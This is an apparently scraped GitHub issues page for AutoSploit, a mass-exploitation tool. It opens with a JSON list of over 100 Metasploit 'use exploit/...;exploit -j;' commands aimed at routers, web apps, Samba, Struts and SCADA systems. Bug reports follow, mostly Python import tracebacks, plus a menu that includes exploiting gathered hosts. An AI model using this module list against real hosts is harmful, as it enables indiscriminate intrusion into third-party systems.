     "use exploit/bsdi/softcart/mercantec_softcart;exploit -j; ",
     "use exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit -j;",
     "use exploit/freebsd/samba/trans2open;exploit -j;",
     "use exploit/linux/ftp/proftp_sreplace;exploit -j; ",
     "use exploit/linux/http/dcos_marathon;exploit -j;",
     "use exploit/linux/http/f5_icall_cmd;exploit -j;",
     "use exploit/linux/http/fritzbox_echo_exec;exploit -j;",
     "use exploit/linux/http/gitlist_exec;exploit -j;",
     "use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j;",
     "use exploit/linux/http/ipfire_bashbug_exec;exploit -j;",
     "use exploit/linux/http/ipfire_oinkcode_exec;exploit -j;",
     "use exploit/linux/http/ipfire_proxy_exec;exploit -j;",
     "use exploit/linux/http/kaltura_unserialize_rce;exploit -j;",
     "use exploit/linux/http/lifesize_uvc_ping_rce;exploit -j;",
     "use exploit/linux/http/nagios_xi_chained_rce;exploit -j;",
     "use exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit -j;",
     "use exploit/linux/http/netgear_wnr2000_rce ;exploit -j;",
     "use exploit/linux/http/nuuo_nvrmini_auth_rce;exploit -j;",
     "use exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit -j;",
     "use exploit/linux/http/op5_config_exec;exploit -j;",
     "use exploit/linux/http/pandora_fms_exec;exploit -j;",
     "use exploit/linux/http/pineapple_preconfig_cmdinject;exploit -j;",
     "use exploit/linux/http/seagate_nas_php_exec_noauth;exploit -j;",
     "use exploit/linux/http/symantec_messaging_gateway_exec;exploit -j;",
     "use exploit/linux/http/trendmicro_imsva_widget_exec;exploit -j;",
     "use exploit/linux/http/trueonline_billion_5200w_rce;exploit -j;",
     "use exploit/linux/http/trueonline_p660hn_v1_rce;exploit -j;",
     "use exploit/linux/http/trueonline_p660hn_v2_rce;exploit -j;",
     "use exploit/linux/http/vcms_upload;exploit -j;",
     "use exploit/linux/misc/lprng_format_string;exploit -j;",
     "use exploit/linux/misc/mongod_native_helper;exploit -j;",
     "use exploit/linux/misc/ueb9_bpserverd;exploit -j;",
     "use exploit/linux/mysql/mysql_yassl_getname;exploit -j;",
     "use exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit -j;",
     "use exploit/linux/postgres/postgres_payload;exploit -j;",
     "use exploit/linux/pptp/poptop_negative_read;exploit -j;",
     "use exploit/linux/proxy/squid_ntlm_authenticate;exploit -j;",
     "use exploit/linux/samba/lsa_transnames_heap;exploit -j;",
     "use exploit/linux/samba/setinfopolicy_heap;exploit -j;",
     "use exploit/linux/samba/trans2open;exploit -j;",
     "use exploit/multi/elasticsearch/script_mvel_rce;exploit -j;",
     "use exploit/multi/elasticsearch/search_groovy_script;exploit -j;",
     "use exploit/multi/http/atutor_sqli;exploit -j;",
     "use exploit/multi/http/axis2_deployer;exploit -j;",
     "use exploit/multi/http/familycms_less_exe;exploit -j;",
     "use exploit/multi/http/freenas_exec_raw;exploit -j;",
     "use exploit/multi/http/gestioip_exec;exploit -j;",
     "use exploit/multi/http/glassfish_deployer;exploit -j;",
     "use exploit/multi/http/glpi_install_rce;exploit -j;",
     "use exploit/multi/http/joomla_http_header_rce;exploit -j; ",
     "use exploit/multi/http/makoserver_cmd_exec;exploit -j;",
     "use exploit/multi/http/novell_servicedesk_rc;exploit -j;",
     "use exploit/multi/http/oracle_reports_rce;exploit -j;",
     "use exploit/multi/http/php_utility_belt_rce;exploit -j;",
     "use exploit/multi/http/phpfilemanager_rce;exploit -j;",
     "use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j;",
     "use exploit/multi/http/phpwiki_ploticus_exec;exploit -j;",
     "use exploit/multi/http/processmaker_exec;exploit -j;",
     "use exploit/multi/http/rails_actionpack_inline_exec;exploit -j;",
     "use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j;",
     "use exploit/multi/http/rails_secret_deserialization;exploit -j;",
     "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
     "use exploit/multi/http/simple_backdoors_exec;exploit -j;",
     "use exploit/multi/http/spree_search_exec;exploit -j;",
     "use exploit/multi/http/spree_searchlogic_exec;exploit -j;",
     "use exploit/multi/http/struts2_rest_xstream;exploit -j;",
     "use exploit/multi/http/struts_code_exec;exploit -j;",
     "use exploit/multi/http/struts_code_exec_classloader;exploit -j;",
     "use exploit/multi/http/struts_code_exec_parameters;exploit -j;",
     "use exploit/multi/http/struts_dev_mode;exploit -j;",
     "use exploit/multi/http/sysaid_auth_file_upload;exploit -j;",
     "use exploit/multi/http/tomcat_jsp_upload_bypass;exploit -j;",
     "use exploit/multi/http/vtiger_install_rce;exploit -j;",
     "use exploit/multi/http/werkzeug_debug_rce;exploit -j;",
     "use exploit/multi/http/zemra_panel_rce;exploit -j;",
     "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
     "use exploit/multi/ids/snort_dce_rpc;exploit -j;",
     "use exploit/multi/misc/batik_svg_java;exploit -j;",
     "use exploit/multi/misc/pbot_exec;exploit -j;",
     "use exploit/multi/misc/veritas_netbackup_cmdexec;exploit -j;",
     "use exploit/multi/mysql/mysql_udf_payload;exploit -j;",
     "use exploit/multi/php/php_unserialize_zval_cookie;exploit -j;",
     "use exploit/unix/http/freepbx_callmenum;exploit -j;",
     "use exploit/unix/http/lifesize_room;exploit -j;",
     "use exploit/unix/http/pfsense_clickjacking;exploit -j;",
     "use exploit/unix/http/pfsense_group_member_exec;exploit -j;",
     "use exploit/unix/http/tnftp_savefile;exploit -j;",
     "use exploit/unix/misc/polycom_hdx_traceroute_exec;exploit -j;",
     "use exploit/unix/webapp/awstats_migrate_exec;exploit -j;",
     "use exploit/unix/webapp/carberp_backdoor_exec;exploit -j;",
     "use exploit/unix/webapp/citrix_access_gateway_exec;exploit -j;",
     "use exploit/unix/webapp/dogfood_spell_exec;exploit -j;",
     "use exploit/unix/webapp/invision_pboard_unserialize_exec;exploit -j;",
     "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j;",
     "use exploit/unix/webapp/mybb_backdoor;exploit -j;",
     "use exploit/unix/webapp/opensis_modname_exec;exploit -j;",
     "use exploit/unix/webapp/oscommerce_filemanager;exploit -j;",
     "use exploit/unix/webapp/piwik_superuser_plugin_upload;exploit -j;",
     "use exploit/unix/webapp/tikiwiki_upload_exec;exploit -j;",
     "use exploit/unix/webapp/webtester_exec;exploit -j;",
     "use exploit/unix/webapp/wp_phpmailer_host_header;exploit -j;",
     "use exploit/unix/webapp/wp_total_cache_exec;exploit -j;",
     "use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j;",
     "use exploit/windows/http/ektron_xslt_exec;exploit -j;",
     "use exploit/windows/http/ektron_xslt_exec_ws;exploit -j;",
     "use exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit -j;",
     "use exploit/windows/http/hp_autopass_license_traversal;exploit -j;",
     "use exploit/windows/http/manage_engine_opmanager_rce;exploit -j;",
     "use exploit/windows/http/netgear_nms_rce;exploit -j;",
     "use exploit/windows/http/sepm_auth_bypass_rce;exploit -j;",
     "use exploit/windows/http/trendmicro_officescan_widget_exec;exploit -j;",
     "use exploit/windows/iis/iis_webdav_upload_asp;exploit -j;",
     "use exploit/windows/iis/msadc;exploit -j;",
     "use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j;",
     "use exploit/windows/novell/file_reporter_fsfui_upload;exploit -j;",
     "use exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit -j;",
     "use exploit/windows/smb/ipass_pipe_exec;exploit -j;",
     "use exploit/windows/smb/smb_relay;exploit -j;",
     "use auxiliary/sqli/oracle/jvm_os_code_10g;exploit -j;",
     "use auxiliary/sqli/oracle/jvm_os_code_11g;exploit -j;",
     "use auxiliary/fuzzers/dns/dns_fuzzer;exploit -j;",
     "use auxiliary/fuzzers/ftp/client_ftp;exploit -j;",
     "use auxiliary/fuzzers/ftp/ftp_pre_post;exploit -j;",
     "use auxiliary/fuzzers/http/http_form_field;exploit -j;",
     "use auxiliary/fuzzers/http/http_get_uri_long;exploit -j;",
     "use auxiliary/fuzzers/http/http_get_uri_strings;exploit -j;",
     "use auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit -j;",
     "use auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit -j;",
     "use auxiliary/fuzzers/smb/smb_create_pipe;exploit -j;",
     "use auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit -j;",
     "use auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit -j; ",
     "use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit -j;",
     "use auxiliary/fuzzers/smb/smb_tree_connect;exploit -j;",
     "use auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit -j;",
     "use auxiliary/fuzzers/smtp/smtp_fuzzer;exploit -j;",
     "use auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit -j;",
     "use auxiliary/fuzzers/ssh/ssh_version_15;exploit -j;",
     "use auxiliary/fuzzers/ssh/ssh_version_2;exploit -j;",
     "use auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit -j;",
     "use auxiliary/fuzzers/tds/tds_login_corrupt;exploit -j;",
     "use auxiliary/fuzzers/tds/tds_login_username;exploit -j;"
  ]
}

JSON is easier to deal with, and this way people can implement their own into the file easily. Or we could accept JSON formatted files with a list of modules (as above) for personal exploits.

Keep testing the same module on the same host.

Running information

What branch did you download?
Clone, or docker run?
Clone
What OS are you running?
Kali Linux 2.0

Exploit module information

What exploit was deployed?
exploit/linux/http/astium_sqli_upload
exploit/linux/http/centreon_sqli_exec
I had tried different modules under /etc/json/default_modules.json, but the same problem.
Was a session generated for the target?
Nope
What version of metasploit are you running?
metasploit v4.16.49-dev-

Program information

Python version number?
Python 2.7
AutoSploit version number?
AutoSploit 2.0
Any console output that is relevant to the issue:
Traceback (error) if any:

It's a problem when I try to start autosploit.py

Python
Problem nr1 with Python
This is the "error":

[+] welcome to autosploit, give us a little bit while we configure
[+] checking for services
Traceback (most recent call last):
File "autosploit.py", line 5, in
main()
File "/data/data/com.termux/files/home/AutoSploit/autosploit/main.py", line 33, in main
choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(service))
File "/data/data/com.termux/files/home/AutoSploit/lib/output.py", line 10, in prompt
question = raw_input(
NameError: name 'raw_input' is not defined
Python2
The problem that I get when I try python2 autosploit.py
The "error":
python2 autosploit.py
Traceback (most recent call last):
File "autosploit.py", line 1, in
from autosploit.main import main
File "/data/data/com.termux/files/home/AutoSploit/autosploit/main.py", line 3, in
from lib.cmdline.cmd import AutoSploitParser
File "/data/data/com.termux/files/home/AutoSploit/lib/cmdline/cmd.py", line 7, in
import lib.jsonize
File "/data/data/com.termux/files/home/AutoSploit/lib/jsonize.py", line 7, in
import lib.settings
File "/data/data/com.termux/files/home/AutoSploit/lib/settings.py", line 11, in
import psutil
ImportError: No module named psutil

Hello I use a question

Running information

What branch did you download?
Clone, or docker run?
What OS are you running?
The download version is:https://github.com/NullArray/AutoSploit
The system version is: Ubuntu 16.04

Exploit module information

What exploit was deployed?
Was a session generated for the target?
What version of metasploit are you running?
metasploit v4.16.46

Program information

Python version number?
AutoSploit version number?
Any console output that is relevant to the issue:
Traceback (error) if any:
python：2.7
autosploit：2.0

I have installed ruby

Minor update

Need to change “agent” to “User-Agent”. “Agent” will not implement the user agent string

https://github.com/NullArray/AutoSploit/blob/master/api_calls/zoomeye.py#L70

Bug of AutoSploit execution

I have found an error during the execution of AutoSploit .
The error is as shown below.

C:\GitHub\AutoSploit>python autosploit.py
Traceback (most recent call last):
File "autosploit.py", line 11, in
from blessings import Terminal
File "C:\Python27\lib\site-packages\blessings_init_.py", line 5, in
import curses
File "C:\Python27\lib\curses_init_.py", line 15, in
from _curses import *
ImportError: No module named _curses

C:\GitHub\AutoSploit>

My machine configuration is as below.
OS version : Windows 10 Home 64bit,
Python version : python-2.7.14 [C:\Python27]
Metasploit Framework version : Metasploit Framework-latest [C:\metasploit-framework]
Cloned AutoSploit : C:\GitHub\AutoSploit
Windows Defender : Disabled

Could someone can help me with this error?
Regards,

help me for errors

root@kali:/Desktop/exploits# git clone https://github.com/NullArray/AutoSploit.git
Cloning into 'AutoSploit'...
remote: Counting objects: 586, done.
remote: Compressing objects: 100% (50/50), done.
remote: Total 586 (delta 35), reused 73 (delta 30), pack-reused 501
Receiving objects: 100% (586/586), 245.03 KiB | 560.00 KiB/s, done.
Resolving deltas: 100% (269/269), done.
...................................................................................................
root@kali:/Desktop/exploits# cd AutoSploit
root@kali:/Desktop/exploits/AutoSploit# ls
api_calls autosploit.py Docker lib README.md requirements.txt
autosploit CONTRIBUTING.md etc LICENSE README-zh.md
root@kali:/Desktop/exploits/AutoSploit# chmod 777 autosploit.py
root@kali:/Desktop/exploits/AutoSploit# chmod 777 requirements.txt
root@kali:/Desktop/exploits/AutoSploit# pip install requirements.txt
Collecting requirements.txt
Could not find a version that satisfies the requirement requirements.txt (from versions: )
.............................................................................................
No matching distribution found for requirements.txt
root@kali:/Desktop/exploits/AutoSploit# pip install shodan
Requirement already satisfied: shodan in /usr/local/lib/python2.7/dist-packages
Requirement already satisfied: requests>=2.2.1 in /usr/lib/python2.7/dist-packages (from shodan)
Requirement already satisfied: click in /usr/lib/python2.7/dist-packages (from shodan)
Requirement already satisfied: click-plugins in /usr/local/lib/python2.7/dist-packages (from shodan)
Requirement already satisfied: colorama in /usr/lib/python2.7/dist-packages (from shodan)
Requirement already satisfied: XlsxWriter in /usr/lib/python2.7/dist-packages (from shodan)
.....................................................................................
root@kali:/Desktop/exploits/AutoSploit# pip install blessings
Requirement already satisfied: blessings in /usr/local/lib/python2.7/dist-packages
root@kali:/Desktop/exploits/AutoSploit# ls
api_calls autosploit autosploit.py CONTRIBUTING.md Docker etc lib LICENSE README.md README-zh.md requirements.txt
root@kali:/Desktop/exploits/AutoSploit# python autosploit.py
..........................................................................................

Traceback (most recent call last):
File "autosploit.py", line 1, in
from autosploit.main import main
File "/root/Desktop/exploits/AutoSploit/autosploit/main.py", line 3, in
from lib.cmdline.cmd import AutoSploitParser
File "/root/Desktop/exploits/AutoSploit/lib/cmdline/cmd.py", line 7, in
import lib.jsonize
File "/root/Desktop/exploits/AutoSploit/lib/jsonize.py", line 7, in
import lib.settings
File "/root/Desktop/exploits/AutoSploit/lib/settings.py", line 11, in
import psutil
ImportError: No module named psutil
root@kali:~/Desktop/exploits/AutoSploit#

Asking for Curses Module

When I try to run the: python autosploit.py install
I get this message:

$ python autosploit.py install
Traceback (most recent call last):
File "autosploit.py", line 8, in
from blessings import Terminal
File "C:\Python27\lib\site-packages\blessings_init_.py", line 5, in
import curses
File "C:\Python27\lib\curses_init_.py", line 15, in
from _curses import *
ImportError: No module named _curses

Adding custom hosts

Running information

What branch did you download? Master
Clone, or docker run? Clone
What OS are you running? MacOS 10.13.3

Exploit module information

What exploit was deployed? n/a
Was a session generated for the target? n/a
What version of metasploit are you running? n/a

Program information

Python version number? python 2.7.14
AutoSploit version number? 2.1
Any console output that is relevant to the issue:

1. Usage And Legal
2. Gather Hosts
3. Custom Hosts
4. Add Single Host
5. View Gathered Hosts
6. Exploit Gathered Hosts
99. Quit

root@autosploit# 3
------------------------------
[?] enter the full path to your host file: <IP>
[?] specify full path to a whitelist file, otherwise hit enter:

Traceback (error) if any:

Traceback (most recent call last):
  File "autosploit.py", line 5, in <module>
    main()
  File "/Users/admin/bin/python/autosploit/autosploit/main.py", line 86, in main
    terminal.terminal_main_display(loaded_exploits)
  File "/Users/admin/bin/python/autosploit/lib/term/terminal.py", line 291, in terminal_main_display
    self.custom_host_list(loaded_mods)
  File "/Users/admin/bin/python/autosploit/lib/term/terminal.py", line 238, in custom_host_list
    self.exploit_gathered_hosts(mods, hosts=provided_host_file)
  File "/Users/admin/bin/python/autosploit/lib/term/terminal.py", line 184, in exploit_gathered_hosts
    host_file = open(hosts).readlines()
IOError: [Errno 2] No such file or directory: '<IP>'

nullarray / autosploit Goto Github PK

autosploit's Introduction

Helpful links

Installation

Docker Compose

Docker

Cloning

Usage

Dependencies

Acknowledgements

Active Development

Note

Translations

autosploit's People

Contributors

Stargazers

Watchers

Forkers

autosploit's Issues

Running information

Exploit module information

Program information

Running information

Exploit module information

Program information

Running information

Exploit module information

Program information

Running information

Exploit module information

Program information

Running information

Exploit module information

Program information

Running information

Exploit module information

Program information

Recommend Projects

Recommend Topics

Recommend Org